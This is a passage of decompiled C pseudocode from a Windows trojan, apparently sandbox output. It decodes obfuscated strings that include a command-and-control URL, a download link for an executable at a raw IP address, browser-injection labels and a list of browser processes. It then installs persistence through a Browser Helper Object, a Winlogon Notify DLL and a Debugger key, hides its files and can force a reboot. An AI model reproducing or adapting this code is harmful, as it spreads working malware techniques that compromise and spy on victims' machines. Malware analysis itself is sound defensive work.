					__eflags =  *_t470;
					_t470 = (_t470 ^ _t1076) + 1;
				}
				_t471 = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)";
				while(1) {
					__eflags = _t471 - 0x410309;
					if(_t471 >= 0x410309) {
						break;
					}
					 *_t471 =  *_t471 ^ 0x000000d4;
					__eflags =  *_t471;
					_t471 = (_t471 ^ _t1076) + 1;
				}
				_t472 = "HTTP/1.0 200";
				while(1) {
					__eflags = _t472 - 0x4102c8;
					if(_t472 >= 0x4102c8) {
						break;
					}
					 *_t472 =  *_t472 ^ 0x000000d4;
					__eflags =  *_t472;
					_t472 = (_t472 ^ _t1076) + 1;
				}
				_t473 = "urlinj_conn";
				while(1) {
					__eflags = _t473 - 0x4102bb;
					if(_t473 >= 0x4102bb) {
						break;
					}
					 *_t473 =  *_t473 ^ 0x000000d4;
					__eflags =  *_t473;
					_t473 = (_t473 ^ _t1076) + 1;
				}
				_t474 = "urlinj_creat";
				while(1) {
					__eflags = _t474 - 0x4102af;
					if(_t474 >= 0x4102af) {
						break;
					}
					 *_t474 =  *_t474 ^ 0x000000d4;
					__eflags =  *_t474;
					_t474 = (_t474 ^ _t1076) + 1;
				}
				_t475 = "urlinj_xfer";
				while(1) {
					__eflags = _t475 - 0x4102a2;
					if(_t475 >= 0x4102a2) {
						break;
					}
					 *_t475 =  *_t475 ^ 0x000000d4;
					__eflags =  *_t475;
					_t475 = (_t475 ^ _t1076) + 1;
				}
				_t476 = "urlinj_creat_f";
				while(1) {
					__eflags = _t476 - 0x410296;
					if(_t476 >= 0x410296) {
						break;
					}
					 *_t476 =  *_t476 ^ 0x000000d4;
					__eflags =  *_t476;
					_t476 = (_t476 ^ _t1076) + 1;
				}
				_t477 = "urlinj_fork";
				while(1) {
					__eflags = _t477 - 0x410287;
					if(_t477 >= 0x410287) {
						break;
					}
					 *_t477 =  *_t477 ^ 0x000000d4;
					__eflags =  *_t477;
					_t477 = (_t477 ^ _t1076) + 1;
				}
				_t478 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
				while(1) {
					__eflags = _t478 - 0x41027b;
					if(_t478 >= 0x41027b) {
						break;
					}
					 *_t478 =  *_t478 ^ 0x000000d4;
					__eflags =  *_t478;
					_t478 = (_t478 ^ _t1076) + 1;
				}
				_t479 = "ConnPred";
				while(1) {
					__eflags = _t479 - 0x410230;
					if(_t479 >= 0x410230) {
						break;
					}
					 *_t479 =  *_t479 ^ 0x000000d4;
					__eflags =  *_t479;
					_t479 = (_t479 ^ _t1076) + 1;
				}
				_t480 = "UseExtProfile";
				while(1) {
					__eflags = _t480 - 0x410227;
					if(_t480 >= 0x410227) {
						break;
					}
					 *_t480 =  *_t480 ^ 0x000000d4;
					__eflags =  *_t480;
					_t480 = (_t480 ^ _t1076) + 1;
				}
				_t481 = "UseDflProfile";
				while(1) {
					__eflags = _t481 - 0x410219;
					if(_t481 >= 0x410219) {
						break;
					}
					 *_t481 =  *_t481 ^ 0x000000d4;
					__eflags =  *_t481;
					_t481 = (_t481 ^ _t1076) + 1;
				}
				_t482 = "http://utbidet-ugeas.biz/d/cc";
				while(1) {
					__eflags = _t482 - 0x41020b;
					if(_t482 >= 0x41020b) {
						break;
					}
					 *_t482 =  *_t482 ^ 0x000000d4;
					__eflags =  *_t482;
					_t482 = (_t482 ^ _t1076) + 1;
				}
				_t483 = "grazie.gif";
				while(1) {
					__eflags = _t483 - 0x4101ed;
					if(_t483 >= 0x4101ed) {
						break;
					}
					 *_t483 =  *_t483 ^ 0x000000d4;
					__eflags =  *_t483;
					_t483 = (_t483 ^ _t1076) + 1;
				}
				_t484 = "http://69.50.173.166/gdnOT2424.exe";
				while(1) {
					__eflags = _t484 - 0x4101e2;
					if(_t484 >= 0x4101e2) {
						break;
					}
					 *_t484 =  *_t484 ^ 0x000000d4;
					__eflags =  *_t484;
					_t484 = (_t484 ^ _t1076) + 1;
				}
				_t485 = "tombul.gif";
				while(1) {
					__eflags = _t485 - 0x4101a5;
					if(_t485 >= 0x4101a5) {
						break;
					}
					 *_t485 =  *_t485 ^ 0x000000d4;
					__eflags =  *_t485;
					_t485 = (_t485 ^ _t1076) + 1;
				}
				_t486 = "SubshellState";
				while(1) {
					__eflags = _t486 - 0x41019a;
					if(_t486 >= 0x41019a) {
						break;
					}
					 *_t486 =  *_t486 ^ 0x000000d4;
					__eflags =  *_t486;
					_t486 = (_t486 ^ _t1076) + 1;
				}
				_t487 = "g00d d0gg";
				while(1) {
					__eflags = _t487 - 0x41018c;
					if(_t487 >= 0x41018c) {
						break;
					}
					 *_t487 =  *_t487 ^ 0x000000d4;
					__eflags =  *_t487;
					_t487 = (_t487 ^ _t1076) + 1;
				}
				_t488 = "winlogon.exe";
				while(1) {
					__eflags = _t488 - 0x410182;
					if(_t488 >= 0x410182) {
						break;
					}
					 *_t488 =  *_t488 ^ 0x000000d4;
					__eflags =  *_t488;
					_t488 = (_t488 ^ _t1076) + 1;
				}
				_t489 = "explorer.exe";
				while(1) {
					__eflags = _t489 - 0x410175;
					if(_t489 >= 0x410175) {
						break;
					}
					 *_t489 =  *_t489 ^ 0x000000d4;
					__eflags =  *_t489;
					_t489 = (_t489 ^ _t1076) + 1;
				}
				_t490 = "iexplore.exe";
				while(1) {
					__eflags = _t490 - 0x410168;
					if(_t490 >= 0x410168) {
						break;
					}
					 *_t490 =  *_t490 ^ 0x000000d4;
					__eflags =  *_t490;
					_t490 = (_t490 ^ _t1076) + 1;
				}
				_t491 = "firefox.exe";
				while(1) {
					__eflags = _t491 - 0x41015b;
					if(_t491 >= 0x41015b) {
						break;
					}
					 *_t491 =  *_t491 ^ 0x000000d4;
					__eflags =  *_t491;
					_t491 = (_t491 ^ _t1076) + 1;
				}
				_t492 = "mozilla.exe";
				while(1) {
					__eflags = _t492 - 0x41014f;
					if(_t492 >= 0x41014f) {
						break;
					}
					 *_t492 =  *_t492 ^ 0x000000d4;
					__eflags =  *_t492;
					_t492 = (_t492 ^ _t1076) + 1;
				}
				_t493 = "seamonkey.exe";
				while(1) {
					__eflags = _t493 - 0x410143;
					if(_t493 >= 0x410143) {
						break;
					}
					 *_t493 =  *_t493 ^ 0x000000d4;
					__eflags =  *_t493;
					_t493 = (_t493 ^ _t1076) + 1;
				}
				_t494 = "opera.exe";
				while(1) {
					__eflags = _t494 - 0x410135;
					if(_t494 >= 0x410135) {
						break;
					}
					 *_t494 =  *_t494 ^ 0x000000d4;
					__eflags =  *_t494;
					_t494 = (_t494 ^ _t1076) + 1;
				}
				_t495 = "DLLName";
				while(1) {
					__eflags = _t495 - 0x41012b;
					if(_t495 >= 0x41012b) {
						break;
					}
					 *_t495 =  *_t495 ^ 0x000000d4;
					__eflags =  *_t495;
					_t495 = (_t495 ^ _t1076) + 1;
				}
				_t496 = "Startup";
				while(1) {
					__eflags = _t496 - 0x410123;
					if(_t496 >= 0x410123) {
						break;
					}
					 *_t496 =  *_t496 ^ 0x000000d4;
					__eflags =  *_t496;
					_t496 = (_t496 ^ _t1076) + 1;
				}
				_t497 = "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32";
				while(1) {
					__eflags = _t497 - 0x41011b;
					if(_t497 >= 0x41011b) {
						break;
					}
					 *_t497 =  *_t497 ^ 0x000000d4;
					__eflags =  *_t497;
					_t497 = (_t497 ^ _t1076) + 1;
				}
				_t498 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}";
				while(1) {
					__eflags = _t498 - 0x4100d0;
					if(_t498 >= 0x4100d0) {
						break;
					}
					 *_t498 =  *_t498 ^ 0x000000d4;
					__eflags =  *_t498;
					_t498 = (_t498 ^ _t1076) + 1;
				}
				_t499 = "ThreadingModel";
				while(1) {
					__eflags = _t499 - 0x41005e;
					if(_t499 >= 0x41005e) {
						break;
					}
					 *_t499 =  *_t499 ^ 0x000000d4;
					__eflags =  *_t499;
					_t499 = (_t499 ^ _t1076) + 1;
				}
				_t500 = "Both";
				while(1) {
					__eflags = _t500 - 0x41004f;
					if(_t500 >= 0x41004f) {
						break;
					}
					 *_t500 =  *_t500 ^ 0x000000d4;
					__eflags =  *_t500;
					_t500 = (_t500 ^ _t1076) + 1;
				}
				_t501 = "http://%s/";
				while(1) {
					__eflags = _t501 - 0x41004a;
					if(_t501 >= 0x41004a) {
						break;
					}
					 *_t501 =  *_t501 ^ 0x000000d4;
					__eflags =  *_t501;
					_t501 = (_t501 ^ _t1076) + 1;
				}
				while(1) {
					__eflags = 0x40fa40 - "http://%s/";
					if(0x40fa40 >= "http://%s/") {
						break;
					}
					 *0x40fa40 =  *0x40fa40 ^ 0x0000004d;
					__eflags =  *0x40fa40;
					 *(_t1151 + 0x40) =  *(_t1151 + 0x40) ^ _t1068;
				}
				while(1) {
					__eflags = 0x40e640 - 0x40fa40;
					if(0x40e640 >= 0x40fa40) {
						break;
					}
					 *0x40e640 =  *0x40e640 ^ 0x0000004d;
					__eflags =  *0x40e640;
					 *(_t1151 + 0x40) =  *(_t1151 + 0x40) ^ _t1068;
				}
				while(1) {
					__eflags = 0x408840 - 0x40e640;
					if(0x408840 >= 0x40e640) {
						break;
					}
					 *0x408840 =  *0x408840 ^ 0x0000004d;
					__eflags =  *0x408840;
					 *(_t1151 + 0x40) =  *(_t1151 + 0x40) ^ _t1068;
				}
				_t506 = CreateFileA(_t1155 + 0x1580, 0x80000000, 1, 0, 3, 0, 0); // executed
				 *(_t1155 + 0xa0) = _t506;
				__eflags = _t506;
				if(_t506 != 0) {
					__eflags = _t506 - 0xffffffff;
					if(_t506 != 0xffffffff) {
						SetFilePointer(_t506, 0xfffffff0, 0, 2); // executed
						ReadFile( *(_t1155 + 0xb0), 0x4120e0, 0x10, _t1155 + 0xa0, 0); // executed
						CloseHandle( *(_t1155 + 0xa0)); // executed
						__eflags =  *0x4120e0;
						if( *0x4120e0 == 0) {
							 *0x4120e0 = E004010B2();
							 *(_t1155 + 0x20) = 1;
						}
					}
				}
				_t507 = ".exe";
				while(1) {
					__eflags = _t507 - 0x408822;
					if(_t507 >= 0x408822) {
						break;
					}
					 *_t507 =  *_t507 ^ 0x000000d4;
					_t507 =  &(_t507[1]);
				}
				_t508 = ".dll";
				while(1) {
					__eflags = _t508 - 0x40881d;
					if(__eflags >= 0) {
						break;
					}
					 *_t508 =  *_t508 ^ 0x000000d4;
					__eflags =  *_t508;
					_t508 = (_t508 ^ _t1076) + 1;
				}
				_t509 =  *0x4120e0; // 0x8ff5b2f0
				 *(_t1155 + 0x9c) = _t509;
				 *0x412090 = E00401F84(".exe", _t1155 + 0x9c, __eflags);
				 *0x4120a0 = E00401F84(".exe", _t1155 + 0x9c, __eflags);
				 *0x4120b0 = E00401F84(".exe", _t1155 + 0x9c, __eflags);
				 *0x4120c0 = E00401F84(".dll", _t1155 + 0x9c, __eflags);
				_t1081 = _t1155 + 0x9c;
				_t519 = E00401F84(".dll", _t1081, __eflags);
				_push( *0x4120b0);
				 *0x4120d0 = _t519;
				_t521 = E004010DC(_t1155 + 0x156c);
				_push(_t521); // executed
				L00405E50(); // executed
				__eflags = _t521;
				_t21 = _t521 == 0;
				__eflags = _t21;
				 *(_t1155 + 0x1c) = (_t521 & 0xffffff00 | _t21) & 0x000000ff;
				_t524 = "qnd_b__-12";
				while(1) {
					__eflags = _t524 - 0x408818;
					if(_t524 >= 0x408818) {
						break;
					}
					 *_t524 =  *_t524 ^ 0x000000d4;
					__eflags =  *_t524;
					_t524 = (_t524 ^ _t1081) + 1;
				}
				_t525 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy";
				while(1) {
					__eflags = _t525 - 0x40880d;
					if(_t525 >= 0x40880d) {
						break;
					}
					 *_t525 =  *_t525 ^ 0x000000d4;
					__eflags =  *_t525;
					_t525 = (_t525 ^ _t1081) + 1;
				}
				_t526 = "Default Flags";
				while(1) {
					__eflags = _t526 - 0x4087a5;
					if(_t526 >= 0x4087a5) {
						break;
					}
					 *_t526 =  *_t526 ^ 0x000000d4;
					__eflags =  *_t526;
					_t526 = (_t526 ^ _t1081) + 1;
				}
				 *(_t1155 + 0x34) = 1;
				while(1) {
					_push( *(_t1155 + 0x34));
					wsprintfA(0x408816, "%02X");
					_t528 = CreateMutexA(0x408778, 1, "qnd_b__-12"); // executed
					 *(_t1155 + 0x1c) = _t528;
					_t1155 = _t1155 + 0xc;
					__eflags = _t528;
					if(_t528 == 0) {
						goto L316;
					}
					_t529 = GetLastError();
					__eflags = _t529 - 0xb7;
					if(_t529 != 0xb7) {
						__eflags =  *(_t1155 + 0x34) - 0x11;
						if( *(_t1155 + 0x34) > 0x11) {
							_t1020 = _t1155 + 0x134c;
							_t530 = ExpandEnvironmentStringsA("%ComSpec%", _t1020, 0x104);
							__eflags = _t530;
							if(_t530 != 0) {
								_t916 = CreateFileA(_t1020, 0x80000000, 1, 0, 3, 0, 0); // executed
								 *(_t1155 + 0xa0) = _t916;
								__eflags = _t916 - 0xffffffff;
								_t1120 = _t916;
								if(_t916 != 0xffffffff) {
									GetFileTime(_t1120, _t1155 + 0x84, _t1155 + 0x88, _t1155 + 0x8c);
									CloseHandle( *(_t1155 + 0xa0));
									 *(_t1155 + 0xc) = 1;
								}
							}
							__eflags =  *(_t1155 + 0x1c);
							if( *(_t1155 + 0x1c) != 0) {
								L338:
								_t532 = CreateFileA(_t1155 + 0x1580, 0x80000000, 1, 0, 3, 0, 0);
								 *(_t1155 + 0xa0) = _t532;
								__eflags = _t532;
								if(_t532 == 0) {
									L341:
									 *(_t1155 + 0x14) = 0;
									_t1152 = 0;
									__eflags = 0;
									L342:
									CloseHandle(CreateThread(0, 0x1000, E00401038, _t1155 + 0x1570, 0, _t1155 + 0x9c));
									_t537 = 0x408720;
									while(1) {
										__eflags = _t537 - 0x408776;
										if(_t537 >= 0x408776) {
											break;
										}
										 *_t537 =  *_t537 ^ 0x000000d4;
										_t537 =  &(_t537[1]);
									}
									while(1) {
										__eflags = 0x407b20 - 0x408720;
										if(0x407b20 >= 0x408720) {
											break;
										}
										 *0x407b20 =  *0x407b20 ^ 0x0000004d;
										__eflags =  *0x407b20;
										 *(_t1152 + 0x40) =  *(_t1152 + 0x40) ^ _t1068;
									}
									__eflags =  *0x412100 - 2;
									if( *0x412100 != 2) {
										L374:
										 *(_t1155 + 0x78) = 0x10;
										_t1021 = _t1155 + 0x1ec;
										_t540 = GetComputerNameA(_t1021, _t1155 + 0x78);
										__eflags = _t540;
										if(_t540 == 0) {
											L376:
											_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
											_push(_t1155 + 0x1bc);
											L00405E20();
											L380:
											wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t1155 + 0x1f4)),  *((char*)(_t1155 + 0x1f1)),  *((char*)(_t1155 + 0x1ee)),  *((char*)(_t1155 + 0x1eb)),  *((char*)(_t1155 + 0x1e8)),  *((char*)(_t1155 + 0x1e5)),  *((char*)(_t1155 + 0x1e2)),  *((char*)(_t1155 + 0x1df)),  *((char*)(_t1155 + 0x1dc)),  *((char*)(_t1155 + 0x1d9)),  *((char*)(_t1155 + 0x1d6)),  *((char*)(_t1155 + 0x1d3)),  *((char*)(_t1155 + 0x1d0)),  *((char*)(_t1155 + 0x1cd)),  *((char*)(_t1155 + 0x1ca)),  *((char*)(_t1155 + 0x1c7)));
											_t1156 = _t1155 + 0x48;
											_t559 = 0x407aa0;
											while(1) {
												__eflags = _t559 - 0x407ad5;
												if(_t559 >= 0x407ad5) {
													break;
												}
												 *_t559 =  *_t559 ^ 0x000000d4;
												_t559 =  &(_t559[1]);
											}
											while(1) {
												__eflags = 0x4072a0 - 0x407aa0;
												if(0x4072a0 >= 0x407aa0) {
													break;
												}
												 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
												__eflags =  *0x4072a0;
												 *(_t1152 + 0x40) =  *(_t1152 + 0x40) ^ _t1068;
											}
											_push(0x4122b0);
											_push(0x407aa0);
											_t1022 =  &(_t1156[0x410]);
											_push(_t1022);
											L00405E20();
											_push(0x4072a0);
											L00405E30();
											_t562 = RegCreateKeyA(0x80000002, _t1022,  &(_t1156[0x26]));
											__eflags = _t562;
											if(_t562 != 0) {
												L411:
												_t564 = E004030DE( &(_t1156[0x1ee]));
												_t1156[0x26] = _t564;
												__eflags = _t564;
												if(_t564 == 0) {
													L431:
													_t565 = E004010B2();
													__eflags = _t565;
													_t1082 = _t565;
													if(_t565 == 0) {
														_t1082 = 0x42;
													}
													_t1156[0x1ee] = _t1082;
													_t566 = E004010B2();
													__eflags = _t566;
													_t1083 = _t566;
													if(_t566 == 0) {
														_t1083 = 0x4d;
													}
													_t1156[0x162] = _t1083;
													_push( *0x4120b0);
													_push( &(_t1156[0x163]));
													L00405E20();
													_push( &(_t1156[0x55a]));
													_push( &(_t1156[0x1ac]));
													L00405E20();
													_t1128 = _t1156[5];
													_t570 = _t1128 + _t1152;
													while(1) {
														__eflags = _t1128 - _t570;
														if(_t1128 >= _t570) {
															break;
														}
														 *_t1128 =  *_t1128 ^ _t1156[0x162] & 0x000000ff;
														_t1128 =  &(_t1128[0]);
														_t570 = _t1156[5] + _t1152;
													}
													_t1023 =  &(_t1156[0x517]);
													_t571 = ExpandEnvironmentStringsA("%AppData%\\", _t1023, 0x104);
													__eflags = _t571;
													if(_t571 == 0) {
														L442:
														_t1024 =  &(_t1156[0x516]);
														_t572 = GetTempPathA(0x104, _t1024);
														__eflags = _t572;
														if(_t572 == 0) {
															L450:
															E00401029(_t1156[5]);
															_t1025 =  &(_t1156[0x387]);
															_t575 = GetSystemDirectoryA(_t1025, 0x104);
															_push(0x80);
															_push( *0x4120c0);
															_push(0x41103e);
															_push(_t1025);
															L00405E30();
															L00405E30();
															SetFileAttributesA(_t575, _t575);
															_t577 = CreateFileA(_t1025, 0x40000000, 0, 0, 2, 0x80, 0);
															_t1156[0x28] = _t577;
															__eflags = _t577;
															if(_t577 == 0) {
																L457:
																_t578 = GetLastError();
																__eflags = _t578 - 0x20;
																if(_t578 != 0x20) {
																	_t1026 =  &(_t1156[0x387]);
																	_t579 = ExpandEnvironmentStringsA("%AppData%\\", _t1026, 0x104);
																	_push(0x80);
																	_push( *0x4120c0);
																	L00405E30();
																	SetFileAttributesA(_t579, _t1026);
																	_t581 = CreateFileA(_t1026, 0x40000000, 0, 0, 2, 0x80, 0);
																	_t1156[0x28] = _t581;
																	__eflags = _t581;
																	if(_t581 == 0) {
																		L461:
																		_t582 = GetLastError();
																		__eflags = _t582 - 0x20;
																		if(_t582 == 0x20) {
																			goto L458;
																		}
																		_t753 = GetTempPathA(0x104, _t1026);
																		_push(0x80);
																		_push( *0x4120c0);
																		L00405E30();
																		SetFileAttributesA(_t753, _t1026);
																		_t755 = CreateFileA(_t1026, 0x40000000, 0, 0, 2, 0x80, 0);
																		_t1156[0x28] = _t755;
																		__eflags = _t755;
																		if(_t755 == 0) {
																			L464:
																			_t756 = GetLastError();
																			__eflags = _t756 - 0x20;
																			if(_t756 == 0x20) {
																				goto L458;
																			}
																			L467:
																			_t1027 =  &(_t1156[0x343]);
																			_t587 = ExpandEnvironmentStringsA("%AppData%\\", _t1027, 0x104);
																			_push(0x80);
																			_push( *0x4120d0);
																			L00405E30();
																			SetFileAttributesA(_t587, _t1027);
																			_t589 = CreateFileA(_t1027, 0x40000000, 0, 0, 2, 0x80, 0);
																			_t1156[0x28] = _t589;
																			__eflags = _t589;
																			_t1084 = _t589;
																			if(_t589 == 0) {
																				L469:
																				_t1028 =  &(_t1156[0x342]);
																				_t590 = GetTempPathA(0x104, _t1028);
																				_push(0x80);
																				_push( *0x4120d0);
																				L00405E30();
																				SetFileAttributesA(_t590, _t1028);
																				_t592 = CreateFileA(_t1028, 0x40000000, 0, 0, 2, 0x80, 0);
																				_t1156[0x28] = _t592;
																				__eflags = _t592;
																				_t1084 = _t592;
																				if(_t592 == 0) {
																					L472:
																					_t1156[0x342] = 0;
																					L473:
																					__eflags = _t1156[0x342];
																					if(_t1156[0x342] != 0) {
																						CreateFileA( &(_t1156[0x348]), 0x80000000, 1, 0, 3, 0, 0);
																					}
																					_t1029 =  &(_t1156[0x2b]);
																					GetSystemDirectoryA(_t1029, 0x104);
																					_push(0x41103e);
																					_push(_t1029);
																					L00405E30();
																					E004012C2(_t1029);
																					ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t1029, 0x104);
																					E004012C2(_t1029);
																					ExpandEnvironmentStringsA("%AppData%\\", _t1029, 0x104);
																					E004012C2(_t1029);
																					_t602 = 0x407220;
																					while(1) {
																						__eflags = _t602 - 0x40724d;
																						if(_t602 >= 0x40724d) {
																							break;
																						}
																						 *_t602 =  *_t602 ^ 0x000000d4;
																						_t602 =  &(_t602[1]);
																					}
																					_t603 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t1156[0x26]));
																					__eflags = _t603;
																					if(_t603 == 0) {
																						L480:
																						__eflags = _t1156[0xb];
																						if(_t1156[0xb] == 0) {
																							_t1042 =  &(_t1156[0x55a]);
																							_t743 = E00401251(_t1156[0x26]);
																							_push(_t1042);
																							L00405E40();
																							_t744 = _t743 + 1;
																							__eflags = _t744;
																							RegSetValueExA(_t1156[0x2b],  *0x4120b0, 0, 1, _t1042, _t744);
																						}
																						RegDeleteValueA(_t1156[0x27], "winrnt.exe");
																						RegCloseKey(_t1156[0x26]);
																						L483:
																						__eflags =  *0x412100 - 2;
																						if( *0x412100 != 2) {
																							L523:
																							CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t1156[0x27])));
																							_t608 = 0x407000;
																							while(1) {
																								__eflags = _t608 - 0x407060;
																								if(_t608 >= 0x407060) {
																									break;
																								}
																								 *_t608 =  *_t608 ^ 0x000000d4;
																								_t608 =  &(_t608[1]);
																							}
																							_t1156[0xc] = 0;
																							while(1) {
																								E004011CF(0x80000002, 0x407000);
																								__eflags = _t1156[0xc] - 9;
																								if(_t1156[0xc] <= 9) {
																									goto L562;
																								}
																								L528:
																								_t1156[0x16] = 0;
																								_t1156[0x17] = 0;
																								_t667 = E004025C3();
																								__eflags = _t667;
																								if(_t667 != 0) {
																									L559:
																									 *_t1156 = 0;
																									L563:
																									_t1156[0xd] = 0x3b;
																									do {
																										__eflags = _t1156[0x342];
																										if(_t1156[0x342] != 0) {
																											_push(0);
																											_push("opera.exe");
																											_push("seamonkey.exe");
																											_push("mozilla.exe");
																											_push("firefox.exe");
																											_push("iexplore.exe");
																											_push("explorer.exe");
																											E0040318D( &(_t1156[0x349]));
																											_t1156 =  &(_t1156[8]);
																										}
																										__eflags = _t1156[0xa];
																										if(_t1156[0xa] != 0) {
																											_t1033 =  &(_t1156[0x3cb]);
																											SetFileAttributesA(_t1033, 0x21);
																											_t644 = RegCreateKeyA(0x80000002,  &(_t1156[0x40f]),  &(_t1156[0x26]));
																											__eflags = _t644;
																											if(_t644 == 0) {
																												E00401251(_t1156[0x26]);
																												_t1156[0x27] = 1;
																												_t648 = RegSetValueExA(_t1156[0x2b], "IsInstalled", 0, 4,  &(_t1156[0x28]), 4);
																												_push(_t1033);
																												L00405E40();
																												_t649 = _t648 + 1;
																												__eflags = _t649;
																												RegSetValueExA(_t1156[0x2b], "StubPath", 0, 1, _t1033, _t649);
																												RegCloseKey(_t1156[0x26]);
																											}
																										}
																										__eflags = _t1156[0xb];
																										_t1129 =  &(_t1156[0x26]);
																										if(_t1156[0xb] == 0) {
																											_t611 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t1129);
																											__eflags = _t611;
																											if(_t611 == 0) {
																												L574:
																												_t1030 =  &(_t1156[0x55a]);
																												_push(_t1030);
																												L00405E40();
																												_t612 = _t611 + 1;
																												__eflags = _t612;
																												_push(_t612);
																												_push(_t1030);
																												_push(1);
																												_push(0);
																												_push( *0x4120b0);
																												L575:
																												RegSetValueExA(_t1156[0x2b], ??, ??, ??, ??, ??);
																												RegCloseKey(_t1156[0x26]);
																												L576:
																												__eflags = _t1156[9];
																												if(_t1156[9] == 0) {
																													goto L586;
																												}
																												_t1031 =  &(_t1156[0x27]);
																												_t619 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1031, 0);
																												__eflags = _t619;
																												if(_t619 == 0) {
																													L579:
																													RegSetValueExA(_t1156[0x2b], "SubshellState", 0, 3,  &(_t1156[0x1ef]), 0x22a);
																													RegCloseKey(_t1156[0x26]);
																													L580:
																													_t1032 =  &(_t1156[0x387]);
																													SetFileAttributesA(_t1032, 0x21);
																													__eflags =  *0x412100 - 2;
																													_t1132 =  &(_t1156[0x26]);
																													if( *0x412100 != 2) {
																														_t624 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t1132);
																														__eflags = _t624;
																														if(_t624 != 0) {
																															goto L586;
																														}
																														_push(_t1032);
																														L00405E40();
																														RegSetValueExA(_t1156[0x2b], 0, 0, 1, _t1032, _t624 + 1);
																														RegSetValueExA(_t1156[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																														RegCloseKey(_t1156[0x26]);
																														_t629 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t1132);
																														__eflags = _t629;
																														if(_t629 != 0) {
																															goto L586;
																														}
																														L585:
																														RegCloseKey(_t1156[0x26]);
																														goto L586;
																													}
																													_t631 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t1132);
																													__eflags = _t631;
																													if(_t631 != 0) {
																														goto L586;
																													}
																													_t633 = E00401251(_t1156[0x26]);
																													_push(_t1032);
																													L00405E40();
																													RegSetValueExA(_t1156[0x2b], "DLLName", 0, 1, _t1032, _t633 + 1);
																													RegSetValueExA(_t1156[0x2b], "Startup", 0, 1, "Startup", 8);
																													goto L585;
																												}
																												_t637 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1031, 0);
																												__eflags = _t637;
																												if(_t637 != 0) {
																													goto L580;
																												}
																												goto L579;
																											}
																											_t611 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t1129);
																											__eflags = _t611;
																											if(_t611 != 0) {
																												goto L576;
																											}
																											goto L574;
																										}
																										_t1034 =  &(_t1156[0x48f]);
																										SetFileAttributesA(_t1034, 0x21);
																										_t618 = RegCreateKeyA(0x80000002, 0x408720, _t1129);
																										__eflags = _t618;
																										if(_t618 != 0) {
																											goto L576;
																										}
																										_t639 = E00401251(_t1156[0x26]);
																										_push(_t1034);
																										L00405E40();
																										_push(_t639 + 1);
																										_push(_t1034);
																										_push(1);
																										_push(0);
																										_push("Debugger");
																										goto L575;
																										L586:
																										SetFileAttributesA( &(_t1156[0x55b]), 0x21);
																										Sleep(0x3e8);
																										_t423 =  &(_t1156[0xd]);
																										 *_t423 = _t1156[0xd] - 1;
																										__eflags =  *_t423;
																									} while ( *_t423 >= 0);
																									L587:
																									_t655 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t1156[0x12]), 0);
																									__eflags = _t655;
																									if(_t655 != 0) {
																										do {
																											E004011CF(0x80000002, 0x407000);
																											__eflags = _t1156[0xc] - 9;
																											if(_t1156[0xc] <= 9) {
																												goto L562;
																											}
																											goto L528;
																										} while (_t655 != 0);
																									}
																									_t1156[0x10] = 4;
																									_t1038 =  &(_t1156[0x10]);
																									_t657 = RegQueryValueExA(_t1156[0x16], "g00d d0gg", 0, 0, _t1038,  &(_t1156[0x10]));
																									__eflags = _t657;
																									if(_t657 == 0) {
																										_t660 = _t1156[0xf] - 1;
																										__eflags = _t660;
																										_t1156[0xf] = _t660;
																										if(_t660 == 0) {
																											RegDeleteValueA(_t1156[0x12], "g00d d0gg");
																											Sleep(0x1388);
																											__eflags =  *0x412100 - 2;
																											if( *0x412100 != 2) {
																												ExitWindowsEx(6, 0);
																											} else {
																												RtlAdjustPrivilege(0x13, 1, 0,  &(_t1156[0xe]));
																												 *0x412240(1);
																											}
																										} else {
																											RegSetValueExA(_t1156[0x16], "g00d d0gg", 0, 4, _t1038, 4);
																										}
																									}
																									RegCloseKey(_t1156[0x11]);
																									continue;
																								}
																								_t669 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t1156[0x1c]), 0);
																								__eflags = _t669;
																								if(_t669 != 0) {
																									__eflags =  *_t1156;
																									if( *_t1156 == 0) {
																										goto L563;
																									}
																									L561:
																									_t1156[0xc] = 0;
																									goto L563;
																								}
																								_t1153 =  &(_t1156[0x19]);
																								GetSystemTimeAsFileTime(_t1153);
																								_t1156[0x18] = 8;
																								_t1122 =  &(_t1156[0x17]);
																								_t671 = RegQueryValueExA(_t1156[0x20], "ConnPred", 0,  &(_t1156[0x17]), _t1122,  &(_t1156[0x18]));
																								__eflags = _t671;
																								if(_t671 != 0) {
																									L532:
																									__eflags = E004014D8(_t1153, 0x412070) - 0x4af;
																									if(__eflags <= 0) {
																										L543:
